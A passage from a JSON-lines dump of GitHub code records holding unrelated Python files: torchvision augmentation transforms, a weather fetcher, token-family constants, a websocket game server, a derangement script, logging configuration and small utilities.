0.99, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - (torch.arange(num_bins) / ((num_bins - 1) / 6))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n num_magnitude_bins: int = 31,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ):\n super().__init__(interpolation=interpolation, fill=fill)\n self.num_magnitude_bins = num_magnitude_bins\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n transform_id, (magnitudes_fn, signed) = self._get_random_item(self._AUGMENTATION_SPACE)\n\n magnitudes = magnitudes_fn(self.num_magnitude_bins, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[int(torch.randint(self.num_magnitude_bins, ()))])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass AugMix(_AutoAugmentBase):\n _PARTIAL_AUGMENTATION_SPACE = {\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (lambda num_bins, height, width: torch.linspace(0.0, width / 3.0, num_bins), True),\n \"TranslateY\": (lambda num_bins, height, width: torch.linspace(0.0, height / 3.0, num_bins), True),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (4 - (torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n _AUGMENTATION_SPACE: Dict[str, Tuple[Callable[[int, int, int], Optional[torch.Tensor]], bool]] = {\n **_PARTIAL_AUGMENTATION_SPACE,\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n }\n\n def __init__(\n self,\n severity: int = 3,\n mixture_width: int = 3,\n chain_depth: int = -1,\n alpha: float = 1.0,\n all_ops: bool = True,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self._PARAMETER_MAX = 10\n if not (1 <= severity <= self._PARAMETER_MAX):\n raise ValueError(f\"The severity must be between [1, {self._PARAMETER_MAX}]. Got {severity} instead.\")\n self.severity = severity\n self.mixture_width = mixture_width\n self.chain_depth = chain_depth\n self.alpha = alpha\n self.all_ops = all_ops\n\n def _sample_dirichlet(self, params: torch.Tensor) -> torch.Tensor:\n # Must be on a separate method so that we can overwrite it in tests.\n return torch._sample_dirichlet(params)\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, orig_image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(orig_image_or_video)\n\n if isinstance(orig_image_or_video, torch.Tensor):\n image_or_video = orig_image_or_video\n else: # isinstance(inpt, PIL.Image.Image):\n image_or_video = F.pil_to_tensor(orig_image_or_video)\n\n augmentation_space = self._AUGMENTATION_SPACE if self.all_ops else self._PARTIAL_AUGMENTATION_SPACE\n\n orig_dims = list(image_or_video.shape)\n expected_ndim = 5 if isinstance(orig_image_or_video, features.Video) else 4\n batch = image_or_video.reshape([1] * max(expected_ndim - image_or_video.ndim, 0) + orig_dims)\n batch_dims = [batch.size(0)] + [1] * (batch.ndim - 1)\n\n # Sample the beta weights for combining the original and augmented image or video. To get Beta, we use a\n # Dirichlet with 2 parameters. The 1st column stores the weights of the original and the 2nd the ones of\n # augmented image or video.\n m = self._sample_dirichlet(\n torch.tensor([self.alpha, self.alpha], device=batch.device).expand(batch_dims[0], -1)\n )\n\n # Sample the mixing weights and combine them with the ones sampled from Beta for the augmented images or videos.\n combined_weights = self._sample_dirichlet(\n torch.tensor([self.alpha] * self.mixture_width, device=batch.device).expand(batch_dims[0], -1)\n ) * m[:, 1].reshape([batch_dims[0], -1])\n\n mix = m[:, 0].reshape(batch_dims) * batch\n for i in range(self.mixture_width):\n aug = batch\n depth = self.chain_depth if self.chain_depth > 0 else int(torch.randint(low=1, high=4, size=(1,)).item())\n for _ in range(depth):\n transform_id, (magnitudes_fn, signed) = self._get_random_item(augmentation_space)\n\n magnitudes = magnitudes_fn(self._PARAMETER_MAX, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[int(torch.randint(self.severity, ()))])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n aug = self._apply_image_or_video_transform(\n aug, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n mix.add_(combined_weights[:, i].reshape(batch_dims) * aug)\n mix = mix.reshape(orig_dims).to(dtype=image_or_video.dtype)\n\n if isinstance(orig_image_or_video, (features.Image, features.Video)):\n mix = orig_image_or_video.wrap_like(orig_image_or_video, mix) # type: ignore[arg-type]\n elif isinstance(orig_image_or_video, PIL.Image.Image):\n mix = F.to_image_pil(mix)\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, mix)\n","repo_name":"gavrilenkoof/opencv_test","sub_path":"models/pytorch_vision_main/torchvision/prototype/transforms/_auto_augment.py","file_name":"_auto_augment.py","file_ext":"py","file_size_in_byte":25594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26141229608","text":"import sys\nfrom signal import signal, SIGQUIT, SIGINT, SIGTERM\nfrom time import sleep\n\nimport requests\nfrom defaultenv import env\nfrom redis import Redis\n\nimport weather\nfrom env_support import require_env\n\nCITY_ID_STHLM = 2673722\nCITY_ID_SOLNA = 2675397\nCITY_CURRENT_WEATHER_URL = (\n \"https://api.openweathermap.org/data/2.5/weather?\"\n \"id={id}&appid={key}&units=metric\"\n)\n\n\ndef quit_handler(signum, frame):\n print()\n print(\"Good bye\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n apiKey: str = require_env(env(\"API_KEY\"), \"API_KEY\")\n period_sec: int = int(env(\"PERIOD_SEC\", -1))\n redis_host: str = env(\"REDIS_HOST\", \"localhost\")\n redis_port: int = int(env(\"REDIS_PORT\", 6379))\n redis_db: int = int(env(\"REDIS_DB\", 0))\n\n place_id = CITY_ID_SOLNA\n url = CITY_CURRENT_WEATHER_URL.format(id=place_id, key=apiKey)\n\n signal(SIGINT, quit_handler)\n signal(SIGQUIT, quit_handler)\n signal(SIGTERM, quit_handler)\n\n print()\n print(f\"Connecting to Redis at {redis_host}:{redis_port} (db={redis_db})...\")\n redis = Redis(host=redis_host, port=redis_port, db=redis_db)\n redis.ping()\n\n if period_sec > 0:\n print(\n f\"Fetching weather data every {period_sec} seconds. Use Ctrl+D to quit...\\n\"\n )\n\n while True:\n resp = requests.get(url)\n resp.raise_for_status()\n\n json = resp.json()\n try:\n state: weather.WeatherState = weather.from_api(json)\n redis.hset(name=place_id, mapping=state)\n print(weather.as_readable(state))\n except Exception as e:\n print(f\"Cannot parse following json:\\n{json}\", file=sys.stderr)\n raise e\n\n if period_sec > 0:\n sleep(period_sec)\n else:\n break\n","repo_name":"meandnano/weatherbot","sub_path":"app/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31076005015","text":"import json\nimport time\nFAMILY_NAME =\"dec\"\nFAMILY_VERSION =\"1.0\"\n\nANY_EMISSION_KEY = \"_{}_EMISSION_KEY_\"\nDEC_EMISSION_KEY = \"_DEC_EMISSION_KEY_\"\nDEC_HEART_BEAT_KEY = \"_DEC_HEART_BEAT_\"\nDEC_ESIGNERS_KEY = \"_DEC_EMISSION_SIG_\"\nDEC_TRANS_KEY = \"_DEC_TRANS_{}\"\nDEC_TRANS_ID = \"tid\"\nDEC_NAME_DEF = \"DEC\"\nDEC_WALLET = 'accounts'\nDEC_WALLET_ALIAS = \"aliases\"\nDEC_INVOICE_DEF = \"INVOICE\"\n# objects groups\nDEC_TARGET_GRP = \"targets\"\nDEC_ROLE_GRP = \"roles\"\nDEC_WALLET_GRP = \"accounts\"\nDEC_EMISSION_GRP = \"emissions\"\nDEC_SYNONYMS_GRP = \"aliases\"\nDEC_SIMPLE_GRP = \"simple\"\n#\nDEC_ESIGNERS = \"signers\"\nDEC_ESIGNATURE = \"esign\"\nDEC_ESIGN_NUM = \"sign_num\"\nDEC_MSIGN_ST = \"signed\"\nDEC_HEART = \"HEARTBEAT\"\nDEC_TOTAL_SUM_DEF = 8589869056\nDEC_GRANULARITY_DEF = 7\nDEC_NОMINAL_DEF = 0.8\nDEC_NОMINAL_NAME_DEF = \"USD\"\nDEC_СORPORATE_SHARE_DEF = 10\nDEC_MINTING_SHARE_DEF = 80\nDEC_NBURN_DEF = 3\nDEC_FEE_DEF = 1\nAVAILABLE_TILL_DEF = 60*60*100\nDEC_WAIT_TO_DATE_DEF = 60*60*24*3\nDEC_MINT_PERIOD_DEF = 60*2\nDEC_HEART_BEAT_PERIOD_DEF = 60*3\nDEFAULT_DID = \"did:notary:30563010:000000000\"\nDEFAULT_GATE = \"this\"\nGATE_ADDR_ATTR = \"addr\"\nDEC_WALLET_LIMIT_DEF = 1000\nDEC_SPEND_PERIOD_DEF = 4\nDEC_TARGET_DEF = \"any target\"\nDEC_TARGET_INFO_DEF = \"empty target\"\nDEC_ROLE_DEF = \"def_role\"\nDEC_ADMIN_PUB_KEY_DEF = \"12345\"\nDEC_PASSKEY_DEF = \"passkey\"\nDEC_TSTAMP_FMT = \"%Y-%m-%d %H:%M:%S\"\n# DEC attributes\nDEC_NAME = \"name\" \nDEC_SYMBOL = \"symbol\" \nDEC_TOTAL_SUM = \"supply_total\" \nDEC_ADMIN_PUB_KEY = \"admin_pub_key\" \nDEC_WAIT_TO_DATE = \"wait_to_date\" \nDEC_GRANULARITY = \"granularity\" \nDEC_PASSKEY = \"passkey\" \nDEC_LINK = \"link\" \nDEC_NОMINAL = \"nominal\" \nDEC_NОMINAL_NAME = \"nominal_name\" \nDEC_СORPORATE_ACCOUNT = \"corporate_account\" \nDEC_CORP_ACC_ADDR = \"account\"\nDEC_CORP_SIGN_MIN = \"sign_min\"\nDEC_SIGN_MIN = \"sign_min\"\nDEC_MULTI_SIGNERS = \"signers_pub_key\"\nDEC_MINTING_SHARE = \"minting_share\" \nDEC_СORPORATE_SHARE = \"corporate_share\"\nDEC_EMISSION_INFO = \"emission\"\nDEC_SALE_SHARE = \"sale_share\" \nDEC_MINT_PARAM = \"mint_param\"\nDEC_MINT_COEF_UMAX = \"Umax\" \nDEC_MINT_COEF_B2 = \"B2\"\nDEC_MINT_COEF_T1 = \"T1\"\nDEC_MINT_PERIOD = \"mint_period\" \nDEC_NBURN = \"nBurn\" \nDEC_FEE = \"fee\"\nDEC_TMSTAMP = \"timestamp\"\nDEC_CREATE_TMSTAMP = \"create_timestamp\"\nDEC_MINT_TMSTAMP = \"mint_timestamp\"\nDEC_MINTING_TOTAL = \"mint_total\"\nDEC_MINTING_REST = \"mint_balance\"\nDEC_СORPORATE_TOTAL = \"foundation_total\"\nDEC_СORPORATE_REST = \"foundation_balance\" \nDEC_SALE_TOTAL = \"sale_total\"\nDEC_SALE_REST = \"sale_balance\" \nDEC_ASSET_TYPE = \"asset_type\"\nDEC_DID_VAL = \"did\" \nDEC_TARGET = \"target\"\nDEC_TARGET_ID = \"name\"\nDEC_TARGET_ADDR = \"addr\"\nDEC_TARGET_URL = \"url\" \nDEC_PROVEMENT_KEY = \"provement_key\" \nDEC_CUSTOMER_KEY = \"customer\"\nAVAILABLE_TILL = \"available_till\" \nDEC_CORPORATE_PUB_KEY = \"corporate_pub_key\"\nDEC_HEART_BEAT_PERIOD = \"heart_period\"\nDEC_HEART_BEAT_TOTAL = \"heart_total\"\nDEC_HEART_BEAT_CURR = \"heart_curr\"\nDEC_HEART_BEAT_PEERS = \"heart_peers\"\nDEC_LAST_HEART_TMSTAMP = \"last_heart_tstamp\"\nDEC_MINT_REWARD = \"mint_reward\"\nDEC_PUBKEY = \"dec_pubkey\"\nNOTARY_PUBKEY = \"notary_pubkey\"\nDEC_SIGNATURE = \"dec_sign\"\nDEC_EMITTER = \"emitter\"\nDEC_OWNER = \"owner\"\nDEC_NOTARY_KEY = \"notary_key\"\nDEC_NOTARY_REQ_SIGN = \"notary_req_sign\"\nDEC_CASHIN_TMSTAMP = \"cashin_timestamp\"\nDEC_CASHIN_AMOUNT = \"cashin_amount\"\nDEC_SPEND_TMSTAMP = \"spend_timestamp\"\nDEC_SPEND_PERIOD = \"spend_period\"\nDEC_WALLET_STATUS = \"status\"\nDEC_WALLET_ROLE = \"role\"\nDEC_WALLET_TOKEN = \"token\"\nDEC_WALLET_STATUS_ON = \"on\"\nDEC_WALLET_STATUS_OFF = \"off\"\nDEC_WALLET_ADDR = \"addr\"\nDEC_TARGET_INFO = \"target_info\"\nDEC_TARGET_PRICE = \"target_price\"\nDEC_WALLETS_OWNERS = \"owner_pub_key\"\nDEC_ROLE_TYPE = \"role_type\"\nDEC_HEADER_PAYLOAD = \"hpayload\" \nDEC_PAYLOAD = \"payload\" \nDEC_HEADER_SIGN = \"header_sign\"\nDEC_CMD_OPTS = \"opts\"\nDEC_TRANS_OPTS = \"topts\"\nDEC_CMD = 'Verb' \nDEC_CMD_ARG = 'Name' \nDEC_CMD_TO = 'To'\nDEC_CMD_TO_GRP = 'to_grp'\nDEC_CMD_VAL = 'Value' \nDEC_CMD_DIN = 'Din' \nDEC_CMD_DIN_EXT = 'DinExt' \nDEC_ALIAS_DIS = 'disable'\n\n\n#DEC_WALLET_DID = \"wallet_did\"\n# wallet properties\nDEC_WALLET_LIMIT = \"limit\"\nDEC_WALLET_SPEND_PERIOD = \"spend_period\"\n#\nDATTR_VAL = \"val\"\nDATTR_COMM = \"comm\"\nDATTR_INPUTS = 'data_inputs'\n# DEC TPROC operation\nDEC_EMISSION_OP = 'emission'\nDEC_WALLET_OP = 'account'\nDEC_WALLET_OPTS_OP = \"opts\"\nDEC_ROLE_OP = 'role'\nDEC_ROLES_OP = \"roles\"\nDEC_GOODS_OP = \"goods\"\nDEC_BIRTH_OP = 'birth'\nDEC_TOTAL_SUPPLY_OP = 'totalsupply'\nDEC_TOKEN_INFO_OP = 'tokeninfo'\nDEC_BURN_OP = 'burn'\nDEC_CHANGE_MINT_OP = 'changemint'\nDEC_DISTRIBUTE_OP = 'distribute'\nDEC_FAUCET_OP = 'faucet'\nDEC_TIPS_OP = 'tips'\nDEC_ALIAS_OP = 'alias'\n\n#\nDEC_MINT_OP = 'mint'\nDEC_HEART_BEAT_OP = 'heartbeat'\nDEC_SEAL_COUNT_OP = \"sealcount\"\n#\nDEC_BALANCE_OF_OP = \"balanceof\"\nDEC_SEND_OP = \"send\"\nDEC_PAY_OP = \"pay\"\nDEC_INVOICE_OP = \"invoice\"\nDEC_TARGET_OP = \"target\"\nDEC_BANK_LIST_OP = \"bank_list\"\nDEC_CORP_ACC_OP = \"corpaccount\"\nDEC_APPROVALS = \"approvals\"\nDEC_APPROVAL = \"approval\"\nDEC_NOTARY_REQ = \"notary_req\"\nDEC_NOTARY_APPROVE = \"notary_approve\"\n#\nDEC_CRT_OP = 'crt'\nDEC_SET_OP = 'set'\nDEC_UPD_OP = 'upd'\nDEC_INC_OP = 'inc'\nDEC_DEC_OP = 'dec'\nDEC_TRANS_OP = 'trans'\n\nVALID_VERBS = DEC_EMISSION_OP, DEC_WALLET_OP,DEC_ALIAS_OP, DEC_WALLET_OPTS_OP, DEC_BURN_OP, DEC_CHANGE_MINT_OP, DEC_FAUCET_OP, DEC_SEND_OP, DEC_PAY_OP, DEC_INVOICE_OP, DEC_TARGET_OP, DEC_ROLE_OP, DEC_MINT_OP, DEC_HEART_BEAT_OP, DEC_SET_OP, DEC_INC_OP, DEC_DEC_OP, DEC_TRANS_OP\nVALID_VERBS_WITH_TO = DEC_EMISSION_OP,DEC_TRANS_OP, DEC_FAUCET_OP, DEC_SEND_OP, DEC_PAY_OP, DEC_MINT_OP,DEC_TARGET_OP\nDEC_TYPES = DEC_NAME_DEF,DEC_INVOICE_DEF,DEC_WALLET,DEC_HEART,DEC_TARGET_GRP,DEC_ROLE_GRP,DEC_SYNONYMS_GRP\nMIN_VALUE = 0\nMAX_VALUE = 4294967295\n\nMAX_NAME_LENGTH = 20\n\nTARGET_VISIBLE_ATTR = DEC_TARGET_ID,DEC_TARGET_URL,DEC_TARGET_ADDR,DEC_TARGET_PRICE,DEC_TARGET_INFO,DEC_OWNER\nLONG_NAME_OPS = DEC_WALLET_OP,DEC_ALIAS_OP,DEC_WALLET_OPTS_OP,DEC_MINT_OP,DEC_SEND_OP,DEC_PAY_OP,DEC_TARGET_OP,DEC_INVOICE_OP,DEC_FAUCET_OP\nEMISSION_UNVISIBLE_ATTR = DEC_PASSKEY,DEC_ADMIN_PUB_KEY,DEC_CORPORATE_PUB_KEY\n\nDEC_PROTO_FILE_NM = \"/project/dgt/etc/dec/emission.json\"\nDEC_COMM_FILE_NM = \"/project/dgt/etc/dec/comment.json\" \nDEC_OPTS_PROTO_FILE_NM = \"/project/dgt/etc/dec/wallet_opts.json\"\nDEC_CORP_OPTS_PROTO_FILE_NM = \"/project/dgt/etc/dec/corp_wallet_opts.json\"\nDEC_ROLE_PROTO_FILE_NM = \"/project/dgt/etc/dec/role.json\"\nDEC_TARGET_PROTO_FILE_NM = \"/project/dgt/etc/dec/target.json\"\n\nDEC_PROTO = { \n \"COUNTRY_NAME\" : \"CA\", \n \"STATE_OR_PROVINCE_NAME\" : \"ONTARIO\", \n \"LOCALITY_NAME\" : \"BARRIE\", \n \"ORGANIZATION_NAME\" : \"YOUR ORGANIZATION NAME\" , \n \"COMMON_NAME\" : \"NODE SAMPLE\", \n \"DNS_NAME\" : \"dgt.world\", \n \"EMAIL_ADDRESS\" : \"adminmail@mail.com\", \n \"PSEUDONYM\" : \"dgt00000000000000000\", \n \"JURISDICTION_COUNTRY_NAME\" : \"CA\", \n \"BUSINESS_CATEGORY\" : \"YOUR BUSINESS CATEGORY\", \n \"USER_ID\" : \"000000000000000001\" \n} \nDEF_WALLET_OPTS = {\n\"role\" : [\"def_role\"], \n\"limit\" : 10001, \n\"spend_period\": 61, \n\"token\" : \"DEC\", \n\"status\" : \"off\" \n}\n# external family \nSETTINGS_NAMESPACE = '000000' \n\n\ndef tmstamp2str(val):\n return time.strftime(DEC_TSTAMP_FMT, time.gmtime(val))\n\n\n\ndef load_json_proto(value): \n if isinstance(value,dict): \n info = value \n else: \n with open(value,\"r\",encoding='utf8') as cert_file: \n try: \n info = json.load(cert_file) \n \n except Exception as ex: \n print('Cant load file {} - {}'.format(value,ex)) \n info = {} \n return info \n \ndef do_verbose(dec,verbose,off=True): \n # \n if off or (verbose is None or verbose == 0): \n for k,v in dec.items(): \n if isinstance(v,dict) and DATTR_VAL in v: \n dec[k] = v[DATTR_VAL] \n if k in [DEC_TMSTAMP,DEC_LAST_HEART_TMSTAMP,DEC_SPEND_TMSTAMP,DEC_CASHIN_TMSTAMP,DEC_CREATE_TMSTAMP,DEC_MINT_TMSTAMP] and not isinstance(dec[k],str): \n dec[k] = tmstamp2str(dec[k]) \n for lock in [DEC_SALE_SHARE,DEC_SALE_TOTAL,DEC_SALE_REST]:\n if lock in dec :\n del dec[lock]\n \n return dec \n","repo_name":"DGT-Network/DGT-Matagami","sub_path":"GARANASKA_BETA/families/dec_dgt/dec_dgt/client_cli/dec_attr.py","file_name":"dec_attr.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5108916029","text":"import asyncio\nimport json\nfrom typing import cast\nfrom uuid import uuid4\n\nimport nest_asyncio\nfrom websockets.server import WebSocketServerProtocol, serve\n\nfrom paper_tactics.adapters.in_memory_game_repository import InMemoryGameRepository\nfrom paper_tactics.adapters.in_memory_match_request_queue import (\n InMemoryMatchRequestQueue,\n)\nfrom paper_tactics.adapters.stdout_logger import StdoutLogger\nfrom paper_tactics.adapters.websockets_player_notifier import WebsocketsPlayerNotifier\nfrom paper_tactics.entities.cell import Cell\nfrom paper_tactics.entities.game_preferences import GamePreferences\nfrom paper_tactics.entities.match_request import MatchRequest\nfrom paper_tactics.use_cases.concede import concede\nfrom paper_tactics.use_cases.create_game import create_game\nfrom paper_tactics.use_cases.make_turn import make_turn\n\nnest_asyncio.apply()\n\ngame_repository = InMemoryGameRepository()\nmatch_request_queue = InMemoryMatchRequestQueue()\nplayer_notifier = WebsocketsPlayerNotifier()\nlogger = StdoutLogger()\n\n\nasync def handler(websocket: WebSocketServerProtocol) -> None:\n async for message in websocket:\n try:\n event = json.loads(message)\n except json.JSONDecodeError as e:\n logger.log_exception(e)\n return\n\n if event.get(\"action\") == \"create-game\":\n preferences = GamePreferences(**event.get(\"preferences\", {}))\n request = MatchRequest(uuid4().hex, event.get(\"view_data\", {}), preferences)\n player_notifier.websockets[request.id] = websocket\n create_game(\n game_repository, match_request_queue, player_notifier, logger, request\n )\n elif event.get(\"action\") == \"make-turn\":\n try:\n player_id = player_notifier.websockets.inverse[websocket]\n game_id = event[\"gameId\"]\n cell = cast(Cell, tuple(event[\"cell\"]))\n assert len(cell) == 2\n except Exception as e:\n logger.log_exception(e)\n return\n make_turn(\n game_repository, player_notifier, logger, game_id, player_id, cell\n )\n elif event.get(\"action\") == \"concede\":\n try:\n player_id = player_notifier.websockets.inverse[websocket]\n game_id = event[\"gameId\"]\n except Exception as e:\n logger.log_exception(e)\n return\n concede(game_repository, player_notifier, logger, game_id, player_id)\n\n\nasync def main() -> None:\n async with serve(handler, \"\", 8001):\n await asyncio.Future()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Kharacternyk/paper-tactics","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9849040169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 16 22:59:33 2017\n\n@author: Tristan Dwyer\n\nscript to assign Kris Kringle gifts\ninspiration came from https://www.youtube.com/watch?v=5kC5k5QBqcc\n\n\"\"\"\nimport math\nfrom random import shuffle\nimport numpy as np\nimport sympy as sy\nimport time\n\n\nt0 = time.time()\n\nlist = [1,2,3,4,5,6,7,8,9,10,11,12]\n\ndef Derangement(x):\n shuffle(x)\n y = [x[-1]] + x[:-1]\n return x,y\n\ndef count(n):\n if n == 2 or n == 0:\n return 1\n elif n == 1:\n return 0\n elif 1 <= n <=20:\n return round(math.factorial(n) / math.e) # Computationally quick\n elif n.imag == 0 and n.real == int(n.real) and n > 0:\n return (n-1) * ( sy.subfact(n - 1) + sy.subfact(n - 2) ) # from http://mathworld.wolfram.com/Subfactorial.html\n else:\n raise ValueError()\n\nprint(\"The total number of possible derangements is: %f\" % count(len(list)))\n \nx,y = Derangement(list)\n\nprint(x,y)\n\nfor number in x:\n print(\"you are number: %f\" % x[number-1])\n print(\"you are buying for: %f\" % y[number-1])\n print(\"\")\n \nprint(\"total run time = \", time.time()-t0)\n# do this in groups for each family? Then pick from a different pile?\n","repo_name":"TrisD/Derangement","sub_path":"Derangement.py","file_name":"Derangement.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40573569285","text":"import logging\nimport logging.config\nimport logging.config\nimport logging.handlers\nfrom pathlib import Path\nfrom typing import Any, Dict\n\nlog_config_registry_map: Dict[str, Any] = {}\n\n\ndef get_log_config(disable_existing_loggers=False, root_logger_level='WARN', app_logger_level='INFO',\n log_dir: Path = Path('.'), to_file=False):\n if to_file is True:\n active_handlers = ['console', 'file', 'errors']\n handlers = {\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'detailed'\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'filename': str(log_dir / 'insurancedb.log'),\n 'mode': 'w',\n 'formatter': 'detailed'\n },\n 'errors': {\n 'class': 'logging.FileHandler',\n 'filename': str(log_dir / 'insurancedb-errors.log'),\n 'mode': 'w',\n 'formatter': 'detailed',\n 'level': 'ERROR'\n }\n }\n }\n else:\n active_handlers = ['console']\n handlers = {\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'detailed'\n }\n }\n }\n\n config = {\n 'version': 1,\n 'disable_existing_loggers': disable_existing_loggers,\n 'formatters': {\n 'detailed': {\n 'class': 'logging.Formatter',\n 'format': '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'\n },\n 'simple': {\n 'class': 'logging.Formatter',\n 'format': '%(name)-15s %(levelname)-8s %(processName)-10s %(message)s'\n }\n },\n 'loggers': {\n 'insurancedb': {\n 'handlers': active_handlers,\n 'level': app_logger_level,\n 'propagate': False\n },\n '__main__': {\n 'handlers': active_handlers,\n 'level': 'DEBUG',\n 'propagate': False\n }\n },\n 'root': {\n 'handlers': active_handlers,\n 'level': root_logger_level\n }\n }\n config.update(handlers)\n return config\n\n\ndef get_dispatch_log_config(q, disable_existing_loggers=False, root_logger_level='WARN', app_logger_level='INFO'):\n config = {\n 'version': 1,\n 'disable_existing_loggers': disable_existing_loggers,\n 'handlers': {\n 'queue': {\n 'class': 'logging.handlers.QueueHandler',\n 'queue': q\n }\n },\n 'loggers': {\n 'insurancedb': {\n 'handlers': ['queue'],\n 'level': app_logger_level,\n 'propagate': False\n },\n '__main__': {\n 'handlers': ['queue'],\n 'level': 'DEBUG',\n 'propagate': False\n }\n },\n 'root': {\n 'handlers': ['queue'],\n 'level': root_logger_level\n }\n }\n return config\n\n\ndef worker_log_initializer(config):\n logging.config.dictConfig(config)\n","repo_name":"ifr1m/insurance-db","sub_path":"insurancedb/log/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2309204377","text":"import torch\nimport numpy as np\nimport os\nimport time\n\n\ndef euclidean_dist(x, y, squared=False):\n \"\"\"\n Compute (Squared) Euclidean distance between two tensors.\n Args:\n x: input tensor with size N x D.\n y: input tensor with size M x D.\n return: distance matrix with size N x M.\n \"\"\"\n n = x.size(0)\n m = y.size(0)\n d = x.size(1)\n if d != y.size(1):\n raise Exception('Invalid input shape.')\n\n x = x.unsqueeze(1).expand(n, m, d)\n y = y.unsqueeze(0).expand(n, m, d)\n dist = torch.pow(x - y, 2).sum(2)\n\n if squared:\n return dist\n else:\n return torch.sqrt(dist+1e-12)\n\n\ndef to_tensor(x, device='cpu'):\n x = torch.from_numpy(x).float()\n x = x.to(device)\n return x\n\n\ndef make_path(path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n\ndef single_input_transform(obs_raw, device='cpu'):\n obs_var = to_tensor(obs_raw, device=device)\n obs_var = obs_var.unsqueeze(0)\n return obs_var\n\n\ndef print_localtime():\n localtime = time.localtime()\n print(\" [%d.%d.%d-%d:%d:%d]\" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday,\n localtime.tm_hour, localtime.tm_min, localtime.tm_sec))\n","repo_name":"trzhang0116/HRAC","sub_path":"discrete/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"30284929992","text":"#Name: Benyir J Pacheco\n#Email: benyir.pacheco60@myhunter.cuny.edu.\n#Date: April 17, 2020\n\n\n\nx = input(\"Enter a string: \")\nupper = 0\nlower = 0\nnum = 0\nspec = 0\n\n\nfor ch in x:\n char = ord(ch)\n if 65 <= char < 91:\n upper = upper + 1\n elif 97 <= char < 123:\n lower = lower + 1\n elif 48 <= char < 58:\n num = num + 1\n else :\n spec = spec + 1\n\nprint(\"Your codeword contains \"+str(upper)+\" uppercase letters, \"+str(lower)+\" lowercase letters, \"+str(num)+\" numbers, and \"+str(spec)+\" special characters.\")\n","repo_name":"benjpacheco/intro_to_python_schoolwork","sub_path":"assignment37.py","file_name":"assignment37.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3336706278","text":"import csv \nimport json \n\nfrom manual import ManualCsvConverter\ndef read_built_in(file): \n jsonArray = []\n with open(file, encoding='utf-8') as f: \n content = csv.DictReader(f) \n for row in content: \n jsonArray.append(row)\n return 